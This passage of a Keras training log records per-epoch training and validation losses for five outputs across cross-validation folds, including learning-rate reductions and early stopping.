120/120 - 8s - loss: 4.2050 - output_react_loss: 0.4552 - output_bg_ph_loss: 0.4826 - output_ph_loss: 0.7076 - output_mg_c_loss: 0.4829 - output_c_loss: 0.6560 - val_loss: 4.5578 - val_output_react_loss: 0.5287 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5279
Epoch 35/70
120/120 - 7s - loss: 4.1196 - output_react_loss: 0.4479 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.6841 - output_mg_c_loss: 0.4790 - output_c_loss: 0.6326 - val_loss: 4.5642 - val_output_react_loss: 0.5291 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6141 - val_output_mg_c_loss: 0.5349 - val_output_c_loss: 0.5277
Epoch 36/70
Epoch 00036: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 4.1539 - output_react_loss: 0.4543 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.6984 - output_mg_c_loss: 0.4783 - output_c_loss: 0.6424 - val_loss: 4.5608 - val_output_react_loss: 0.5286 - val_output_bg_ph_loss: 0.6470 - val_output_ph_loss: 0.6157 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5269
Epoch 37/70
120/120 - 7s - loss: 4.2010 - output_react_loss: 0.4513 - output_bg_ph_loss: 0.4825 - output_ph_loss: 0.7171 - output_mg_c_loss: 0.4820 - output_c_loss: 0.6524 - val_loss: 4.5544 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6467 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5266
Epoch 38/70
120/120 - 7s - loss: 4.0893 - output_react_loss: 0.4433 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.6860 - output_mg_c_loss: 0.4737 - output_c_loss: 0.6247 - val_loss: 4.5552 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6466 - val_output_ph_loss: 0.6138 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5267
Epoch 39/70
120/120 - 7s - loss: 4.1813 - output_react_loss: 0.4526 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7089 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6541 - val_loss: 4.5544 - val_output_react_loss: 0.5272 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5268
Epoch 40/70
120/120 - 7s - loss: 4.0733 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4701 - output_ph_loss: 0.6839 - output_mg_c_loss: 0.4650 - output_c_loss: 0.6399 - val_loss: 4.5556 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5272
Epoch 41/70
120/120 - 7s - loss: 4.0894 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.6876 - output_mg_c_loss: 0.4709 - output_c_loss: 0.6341 - val_loss: 4.5525 - val_output_react_loss: 0.5274 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5269
Epoch 42/70
120/120 - 8s - loss: 4.1918 - output_react_loss: 0.4541 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.4842 - output_c_loss: 0.6530 - val_loss: 4.5551 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6466 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5271
Epoch 43/70
120/120 - 7s - loss: 4.2285 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4855 - output_ph_loss: 0.7191 - output_mg_c_loss: 0.4849 - output_c_loss: 0.6492 - val_loss: 4.5543 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5270
Epoch 44/70
120/120 - 7s - loss: 3.9389 - output_react_loss: 0.4208 - output_bg_ph_loss: 0.4606 - output_ph_loss: 0.6573 - output_mg_c_loss: 0.4551 - output_c_loss: 0.6086 - val_loss: 4.5547 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5269
Epoch 45/70
120/120 - 7s - loss: 4.1721 - output_react_loss: 0.4503 - output_bg_ph_loss: 0.4780 - output_ph_loss: 0.7018 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6468 - val_loss: 4.5578 - val_output_react_loss: 0.5282 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5272
Epoch 46/70
Epoch 00046: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 7s - loss: 4.1766 - output_react_loss: 0.4501 - output_bg_ph_loss: 0.4758 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4777 - output_c_loss: 0.6573 - val_loss: 4.5556 - val_output_react_loss: 0.5279 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5269
Epoch 47/70
120/120 - 7s - loss: 4.1604 - output_react_loss: 0.4493 - output_bg_ph_loss: 0.4744 - output_ph_loss: 0.7118 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6509 - val_loss: 4.5541 - val_output_react_loss: 0.5278 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5268
Epoch 48/70
120/120 - 7s - loss: 4.1509 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4746 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4827 - output_c_loss: 0.6452 - val_loss: 4.5540 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269
Epoch 49/70
120/120 - 7s - loss: 4.1227 - output_react_loss: 0.4461 - output_bg_ph_loss: 0.4759 - output_ph_loss: 0.6962 - output_mg_c_loss: 0.4702 - output_c_loss: 0.6421 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5268
Epoch 50/70
120/120 - 7s - loss: 4.1497 - output_react_loss: 0.4514 - output_bg_ph_loss: 0.4761 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4794 - output_c_loss: 0.6394 - val_loss: 4.5538 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269
Epoch 51/70
Restoring model weights from the end of the best epoch.
Epoch 00051: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07.
120/120 - 7s - loss: 4.0692 - output_react_loss: 0.4418 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6387 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5326 - val_output_c_loss: 0.5269
Epoch 00051: early stopping
FOLD: 2
Epoch 1/70
120/120 - 9s - loss: 8.9128 - output_react_loss: 0.9383 - output_bg_ph_loss: 1.1704 - output_ph_loss: 1.3152 - output_mg_c_loss: 1.1295 - output_c_loss: 1.1212 - val_loss: 6.5853 - val_output_react_loss: 0.7624 - val_output_bg_ph_loss: 0.9432 - val_output_ph_loss: 0.8395 - val_output_mg_c_loss: 0.8012 - val_output_c_loss: 0.7321
Epoch 2/70
120/120 - 7s - loss: 7.5912 - output_react_loss: 0.8057 - output_bg_ph_loss: 0.9756 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9677 - output_c_loss: 0.9707 - val_loss: 5.9750 - val_output_react_loss: 0.6882 - val_output_bg_ph_loss: 0.8614 - val_output_ph_loss: 0.7744 - val_output_mg_c_loss: 0.7194 - val_output_c_loss: 0.6625
Epoch 3/70
120/120 - 7s - loss: 7.1064 - output_react_loss: 0.7623 - output_bg_ph_loss: 0.8993 - output_ph_loss: 1.0778 - output_mg_c_loss: 0.8766 - output_c_loss: 0.9522 - val_loss: 5.4677 - val_output_react_loss: 0.6513 - val_output_bg_ph_loss: 0.7812 - val_output_ph_loss: 0.7253 - val_output_mg_c_loss: 0.6417 - val_output_c_loss: 0.5941
Epoch 4/70
120/120 - 7s - loss: 6.7508 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8445 - output_ph_loss: 1.0186 - output_mg_c_loss: 0.8359 - output_c_loss: 0.8961 - val_loss: 5.1992 - val_output_react_loss: 0.6109 - val_output_bg_ph_loss: 0.7467 - val_output_ph_loss: 0.6903 - val_output_mg_c_loss: 0.6108 - val_output_c_loss: 0.5722
Epoch 5/70
120/120 - 7s - loss: 6.5375 - output_react_loss: 0.7160 - output_bg_ph_loss: 0.8198 - output_ph_loss: 0.9891 - output_mg_c_loss: 0.8013 - output_c_loss: 0.8744 - val_loss: 4.9895 - val_output_react_loss: 0.5965 - val_output_bg_ph_loss: 0.7124 - val_output_ph_loss: 0.6590 - val_output_mg_c_loss: 0.5759 - val_output_c_loss: 0.5609
Epoch 6/70
120/120 - 7s - loss: 6.2897 - output_react_loss: 0.6944 - output_bg_ph_loss: 0.7863 - output_ph_loss: 0.9586 - output_mg_c_loss: 0.7666 - output_c_loss: 0.8363 - val_loss: 4.8275 - val_output_react_loss: 0.5699 - val_output_bg_ph_loss: 0.6906 - val_output_ph_loss: 0.6425 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5416
Epoch 7/70
120/120 - 7s - loss: 6.1039 - output_react_loss: 0.6757 - output_bg_ph_loss: 0.7549 - output_ph_loss: 0.9339 - output_mg_c_loss: 0.7382 - output_c_loss: 0.8322 - val_loss: 4.8011 - val_output_react_loss: 0.5680 - val_output_bg_ph_loss: 0.6876 - val_output_ph_loss: 0.6410 - val_output_mg_c_loss: 0.5562 - val_output_c_loss: 0.5364
Epoch 8/70
120/120 - 7s - loss: 6.0208 - output_react_loss: 0.6756 - output_bg_ph_loss: 0.7429 - output_ph_loss: 0.9175 - output_mg_c_loss: 0.7260 - output_c_loss: 0.8144 - val_loss: 4.7141 - val_output_react_loss: 0.5520 - val_output_bg_ph_loss: 0.6756 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5310
Epoch 9/70
120/120 - 7s - loss: 5.6994 - output_react_loss: 0.6325 - output_bg_ph_loss: 0.7093 - output_ph_loss: 0.8825 - output_mg_c_loss: 0.6814 - output_c_loss: 0.7703 - val_loss: 4.6370 - val_output_react_loss: 0.5421 - val_output_bg_ph_loss: 0.6677 - val_output_ph_loss: 0.6186 - val_output_mg_c_loss: 0.5388 - val_output_c_loss: 0.5210
Epoch 10/70
120/120 - 7s - loss: 5.6689 - output_react_loss: 0.6333 - output_bg_ph_loss: 0.7009 - output_ph_loss: 0.8634 - output_mg_c_loss: 0.6764 - output_c_loss: 0.7843 - val_loss: 4.6090 - val_output_react_loss: 0.5307 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6181 - val_output_mg_c_loss: 0.5431 - val_output_c_loss: 0.5205
Epoch 11/70
120/120 - 7s - loss: 5.6520 - output_react_loss: 0.6270 - output_bg_ph_loss: 0.6931 - output_ph_loss: 0.8810 - output_mg_c_loss: 0.6780 - output_c_loss: 0.7747 - val_loss: 4.6214 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6075 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5131
Epoch 12/70
120/120 - 8s - loss: 5.4352 - output_react_loss: 0.6135 - output_bg_ph_loss: 0.6598 - output_ph_loss: 0.8373 - output_mg_c_loss: 0.6389 - output_c_loss: 0.7736 - val_loss: 4.5804 - val_output_react_loss: 0.5245 - val_output_bg_ph_loss: 0.6611 - val_output_ph_loss: 0.6115 - val_output_mg_c_loss: 0.5368 - val_output_c_loss: 0.5240
Epoch 13/70
120/120 - 7s - loss: 5.1948 - output_react_loss: 0.5789 - output_bg_ph_loss: 0.6361 - output_ph_loss: 0.8005 - output_mg_c_loss: 0.6193 - output_c_loss: 0.7260 - val_loss: 4.6597 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6780 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5512 - val_output_c_loss: 0.5173
Epoch 14/70
120/120 - 7s - loss: 5.2999 - output_react_loss: 0.5952 - output_bg_ph_loss: 0.6389 - output_ph_loss: 0.8436 - output_mg_c_loss: 0.6209 - output_c_loss: 0.7465 - val_loss: 4.5068 - val_output_react_loss: 0.5207 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6002 - val_output_mg_c_loss: 0.5245 - val_output_c_loss: 0.5112
Epoch 15/70
120/120 - 7s - loss: 5.1306 - output_react_loss: 0.5741 - output_bg_ph_loss: 0.6185 - output_ph_loss: 0.8090 - output_mg_c_loss: 0.6039 - output_c_loss: 0.7288 - val_loss: 4.5211 - val_output_react_loss: 0.5159 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6016 - val_output_mg_c_loss: 0.5362 - val_output_c_loss: 0.5062
Epoch 16/70
120/120 - 7s - loss: 5.1908 - output_react_loss: 0.5787 - output_bg_ph_loss: 0.6171 - output_ph_loss: 0.8378 - output_mg_c_loss: 0.6046 - output_c_loss: 0.7522 - val_loss: 4.4677 - val_output_react_loss: 0.5082 - val_output_bg_ph_loss: 0.6455 - val_output_ph_loss: 0.5972 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5101
Epoch 17/70
120/120 - 7s - loss: 4.8559 - output_react_loss: 0.5465 - output_bg_ph_loss: 0.5882 - output_ph_loss: 0.7376 - output_mg_c_loss: 0.5721 - output_c_loss: 0.7048 - val_loss: 4.5045 - val_output_react_loss: 0.5143 - val_output_bg_ph_loss: 0.6495 - val_output_ph_loss: 0.6043 - val_output_mg_c_loss: 0.5306 - val_output_c_loss: 0.5113
Epoch 18/70
120/120 - 7s - loss: 5.0255 - output_react_loss: 0.5594 - output_bg_ph_loss: 0.5926 - output_ph_loss: 0.8123 - output_mg_c_loss: 0.5886 - output_c_loss: 0.7321 - val_loss: 4.4435 - val_output_react_loss: 0.5030 - val_output_bg_ph_loss: 0.6454 - val_output_ph_loss: 0.5924 - val_output_mg_c_loss: 0.5227 - val_output_c_loss: 0.5090
Epoch 19/70
120/120 - 7s - loss: 4.7977 - output_react_loss: 0.5330 - output_bg_ph_loss: 0.5742 - output_ph_loss: 0.7592 - output_mg_c_loss: 0.5608 - output_c_loss: 0.7026 - val_loss: 4.4516 - val_output_react_loss: 0.5021 - val_output_bg_ph_loss: 0.6497 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5071
Epoch 20/70
120/120 - 8s - loss: 4.8366 - output_react_loss: 0.5339 - output_bg_ph_loss: 0.5719 - output_ph_loss: 0.7718 - output_mg_c_loss: 0.5682 - output_c_loss: 0.7168 - val_loss: 4.5308 - val_output_react_loss: 0.5117 - val_output_bg_ph_loss: 0.6645 - val_output_ph_loss: 0.6015 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5107
Epoch 21/70
120/120 - 7s - loss: 4.7086 - output_react_loss: 0.5245 - output_bg_ph_loss: 0.5567 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5511 - output_c_loss: 0.6912 - val_loss: 4.4813 - val_output_react_loss: 0.5113 - val_output_bg_ph_loss: 0.6490 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5102
Epoch 22/70
120/120 - 7s - loss: 4.6421 - output_react_loss: 0.5127 - output_bg_ph_loss: 0.5502 - output_ph_loss: 0.7402 - output_mg_c_loss: 0.5398 - output_c_loss: 0.6963 - val_loss: 4.4557 - val_output_react_loss: 0.5040 - val_output_bg_ph_loss: 0.6519 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5232 - val_output_c_loss: 0.5055
Epoch 23/70
120/120 - 7s - loss: 4.6514 - output_react_loss: 0.5118 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7576 - output_mg_c_loss: 0.5392 - output_c_loss: 0.6970 - val_loss: 4.4421 - val_output_react_loss: 0.5016 - val_output_bg_ph_loss: 0.6492 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5212 - val_output_c_loss: 0.5054
Epoch 24/70
120/120 - 7s - loss: 4.6099 - output_react_loss: 0.5030 - output_bg_ph_loss: 0.5386 - output_ph_loss: 0.7466 - output_mg_c_loss: 0.5384 - output_c_loss: 0.7033 - val_loss: 4.4646 - val_output_react_loss: 0.5075 - val_output_bg_ph_loss: 0.6508 - val_output_ph_loss: 0.5950 - val_output_mg_c_loss: 0.5218 - val_output_c_loss: 0.5094
Epoch 25/70
120/120 - 7s - loss: 4.6612 - output_react_loss: 0.5116 - output_bg_ph_loss: 0.5410 - output_ph_loss: 0.7671 - output_mg_c_loss: 0.5411 - output_c_loss: 0.7068 - val_loss: 4.4891 - val_output_react_loss: 0.5045 - val_output_bg_ph_loss: 0.6496 - val_output_ph_loss: 0.5954 - val_output_mg_c_loss: 0.5386 - val_output_c_loss: 0.5082
Epoch 26/70
120/120 - 7s - loss: 4.4395 - output_react_loss: 0.4891 - output_bg_ph_loss: 0.5246 - output_ph_loss: 0.7109 - output_mg_c_loss: 0.5179 - output_c_loss: 0.6654 - val_loss: 4.4417 - val_output_react_loss: 0.5011 - val_output_bg_ph_loss: 0.6438 - val_output_ph_loss: 0.5984 - val_output_mg_c_loss: 0.5237 - val_output_c_loss: 0.5061
Epoch 27/70
120/120 - 7s - loss: 4.5181 - output_react_loss: 0.4952 - output_bg_ph_loss: 0.5245 - output_ph_loss: 0.7437 - output_mg_c_loss: 0.5240 - output_c_loss: 0.6870 - val_loss: 4.4796 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6477 - val_output_ph_loss: 0.6034 - val_output_mg_c_loss: 0.5297 - val_output_c_loss: 0.5165
Epoch 28/70
120/120 - 7s - loss: 4.2343 - output_react_loss: 0.4702 - output_bg_ph_loss: 0.4963 - output_ph_loss: 0.6728 - output_mg_c_loss: 0.4927 - output_c_loss: 0.6430 - val_loss: 4.4593 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5952 - val_output_mg_c_loss: 0.5253 - val_output_c_loss: 0.5161
Epoch 29/70
120/120 - 7s - loss: 4.4013 - output_react_loss: 0.4723 - output_bg_ph_loss: 0.5051 - output_ph_loss: 0.7193 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6734 - val_loss: 4.4265 - val_output_react_loss: 0.4955 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5036
Epoch 30/70
120/120 - 7s - loss: 4.3896 - output_react_loss: 0.4825 - output_bg_ph_loss: 0.5062 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.5048 - output_c_loss: 0.6827 - val_loss: 4.4442 - val_output_react_loss: 0.5034 - val_output_bg_ph_loss: 0.6440 - val_output_ph_loss: 0.5901 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5084
Epoch 31/70
120/120 - 7s - loss: 4.4621 - output_react_loss: 0.4806 - output_bg_ph_loss: 0.5130 - output_ph_loss: 0.7569 - output_mg_c_loss: 0.5145 - output_c_loss: 0.6892 - val_loss: 4.4552 - val_output_react_loss: 0.5004 - val_output_bg_ph_loss: 0.6472 - val_output_ph_loss: 0.5983 - val_output_mg_c_loss: 0.5229 - val_output_c_loss: 0.5160
Epoch 32/70
120/120 - 7s - loss: 4.2475 - output_react_loss: 0.4605 - output_bg_ph_loss: 0.4863 - output_ph_loss: 0.6962 - output_mg_c_loss: 0.4949 - output_c_loss: 0.6682 - val_loss: 4.4139 - val_output_react_loss: 0.4989 - val_output_bg_ph_loss: 0.6431 - val_output_ph_loss: 0.5878 - val_output_mg_c_loss: 0.5178 - val_output_c_loss: 0.5063
Epoch 33/70
120/120 - 7s - loss: 4.1801 - output_react_loss: 0.4557 - output_bg_ph_loss: 0.4810 - output_ph_loss: 0.6817 - output_mg_c_loss: 0.4887 - output_c_loss: 0.6477 - val_loss: 4.4204 - val_output_react_loss: 0.5017 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5185 - val_output_c_loss: 0.5075
Epoch 34/70
120/120 - 7s - loss: 4.2968 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4961 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.5014 - output_c_loss: 0.6743 - val_loss: 4.4172 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6441 - val_output_ph_loss: 0.5912 - val_output_mg_c_loss: 0.5202 - val_output_c_loss: 0.5060
Epoch 35/70
120/120 - 7s - loss: 4.1495 - output_react_loss: 0.4533 - output_bg_ph_loss: 0.4722 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4812 - output_c_loss: 0.6492 - val_loss: 4.4591 - val_output_react_loss: 0.5022 - val_output_bg_ph_loss: 0.6493 - val_output_ph_loss: 0.5941 - val_output_mg_c_loss: 0.5252 - val_output_c_loss: 0.5116
Epoch 36/70
120/120 - 8s - loss: 4.0763 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4645 - output_ph_loss: 0.6734 - output_mg_c_loss: 0.4782 - output_c_loss: 0.6381 - val_loss: 4.4036 - val_output_react_loss: 0.4951 - val_output_bg_ph_loss: 0.6432 - val_output_ph_loss: 0.5894 - val_output_mg_c_loss: 0.5171 - val_output_c_loss: 0.5035
Epoch 37/70
120/120 - 7s - loss: 4.1241 - output_react_loss: 0.4450 - output_bg_ph_loss: 0.4707 - output_ph_loss: 0.6836 - output_mg_c_loss: 0.4806 - output_c_loss: 0.6479 - val_loss: 4.4011 - val_output_react_loss: 0.4963 - val_output_bg_ph_loss: 0.6378 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5173 - val_output_c_loss: 0.5087
Epoch 38/70
120/120 - 7s - loss: 4.1484 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.7004 - output_mg_c_loss: 0.4808 - output_c_loss: 0.6545 - val_loss: 4.4141 - val_output_react_loss: 0.4966 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5210 - val_output_c_loss: 0.5046
Epoch 39/70
120/120 - 7s - loss: 4.2517 - output_react_loss: 0.4578 - output_bg_ph_loss: 0.4794 - output_ph_loss: 0.7088 - output_mg_c_loss: 0.4968 - output_c_loss: 0.6750 - val_loss: 4.4511 - val_output_react_loss: 0.4998 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6013 - val_output_mg_c_loss: 0.5233 - val_output_c_loss: 0.5109
Epoch 40/70
120/120 - 7s - loss: 4.0662 - output_react_loss: 0.4374 - output_bg_ph_loss: 0.4607 - output_ph_loss: 0.6695 - output_mg_c_loss: 0.4729 - output_c_loss: 0.6544 - val_loss: 4.4141 - val_output_react_loss: 0.5001 - val_output_bg_ph_loss: 0.6404 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5056
Epoch 41/70
120/120 - 7s - loss: 3.8941 - output_react_loss: 0.4138 - output_bg_ph_loss: 0.4496 - output_ph_loss: 0.6444 - output_mg_c_loss: 0.4510 - output_c_loss: 0.6209 - val_loss: 4.4168 - val_output_react_loss: 0.4977 - val_output_bg_ph_loss: 0.6417 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5181 - val_output_c_loss: 0.5070
Epoch 42/70
Epoch 00042: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.1502 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4868 - output_c_loss: 0.6625 - val_loss: 4.4021 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6418 - val_output_ph_loss: 0.5860 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5040
Epoch 43/70
120/120 - 7s - loss: 3.8376 - output_react_loss: 0.4166 - output_bg_ph_loss: 0.4320 - output_ph_loss: 0.6376 - output_mg_c_loss: 0.4413 - output_c_loss: 0.6202 - val_loss: 4.3635 - val_output_react_loss: 0.4917 - val_output_bg_ph_loss: 0.6368 - val_output_ph_loss: 0.5831 - val_output_mg_c_loss: 0.5129 - val_output_c_loss: 0.4978
Epoch 44/70
120/120 - 7s - loss: 3.7882 - output_react_loss: 0.4002 - output_bg_ph_loss: 0.4222 - output_ph_loss: 0.6415 - output_mg_c_loss: 0.4426 - output_c_loss: 0.6167 - val_loss: 4.3476 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6351 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5106 - val_output_c_loss: 0.4974
Epoch 45/70
120/120 - 7s - loss: 3.7885 - output_react_loss: 0.4035 - output_bg_ph_loss: 0.4196 - output_ph_loss: 0.6485 - output_mg_c_loss: 0.4403 - output_c_loss: 0.6132 - val_loss: 4.3480 - val_output_react_loss: 0.4893 - val_output_bg_ph_loss: 0.6345 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5105 - val_output_c_loss: 0.4981
Epoch 46/70
120/120 - 7s - loss: 3.9172 - output_react_loss: 0.4131 - output_bg_ph_loss: 0.4344 - output_ph_loss: 0.6645 - output_mg_c_loss: 0.4510 - output_c_loss: 0.6555 - val_loss: 4.3521 - val_output_react_loss: 0.4891 - val_output_bg_ph_loss: 0.6358 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981
Epoch 47/70
120/120 - 7s - loss: 3.8257 - output_react_loss: 0.4088 - output_bg_ph_loss: 0.4219 - output_ph_loss: 0.6486 - output_mg_c_loss: 0.4438 - output_c_loss: 0.6281 - val_loss: 4.3550 - val_output_react_loss: 0.4909 - val_output_bg_ph_loss: 0.6359 - val_output_ph_loss: 0.5818 - val_output_mg_c_loss: 0.5110 - val_output_c_loss: 0.4977
Epoch 48/70
120/120 - 7s - loss: 3.6280 - output_react_loss: 0.3876 - output_bg_ph_loss: 0.4024 - output_ph_loss: 0.6122 - output_mg_c_loss: 0.4184 - output_c_loss: 0.5991 - val_loss: 4.3525 - val_output_react_loss: 0.4897 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5109 - val_output_c_loss: 0.4990
Epoch 49/70
Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 3.6680 - output_react_loss: 0.3882 - output_bg_ph_loss: 0.4083 - output_ph_loss: 0.6171 - output_mg_c_loss: 0.4273 - output_c_loss: 0.6033 - val_loss: 4.3544 - val_output_react_loss: 0.4894 - val_output_bg_ph_loss: 0.6365 - val_output_ph_loss: 0.5815 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4988
Epoch 50/70
120/120 - 7s - loss: 3.8273 - output_react_loss: 0.4043 - output_bg_ph_loss: 0.4246 - output_ph_loss: 0.6552 - output_mg_c_loss: 0.4440 - output_c_loss: 0.6263 - val_loss: 4.3520 - val_output_react_loss: 0.4888 - val_output_bg_ph_loss: 0.6361 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981
Epoch 51/70
120/120 - 7s - loss: 3.7274 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4092 - output_ph_loss: 0.6250 - output_mg_c_loss: 0.4293 - output_c_loss: 0.6293 - val_loss: 4.3505 - val_output_react_loss: 0.4884 - val_output_bg_ph_loss: 0.6360 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5112 - val_output_c_loss: 0.4977
Epoch 52/70
120/120 - 7s - loss: 3.6490 - output_react_loss: 0.3857 - output_bg_ph_loss: 0.4046 - output_ph_loss: 0.6147 - output_mg_c_loss: 0.4234 - output_c_loss: 0.6068 - val_loss: 4.3496 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6357 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5108 - val_output_c_loss: 0.4978
Epoch 53/70
120/120 - 7s - loss: 3.7603 - output_react_loss: 0.3971 - output_bg_ph_loss: 0.4124 - output_ph_loss: 0.6570 - output_mg_c_loss: 0.4288 - output_c_loss: 0.6266 - val_loss: 4.3507 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4982
Epoch 54/70
Restoring model weights from the end of the best epoch.
Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
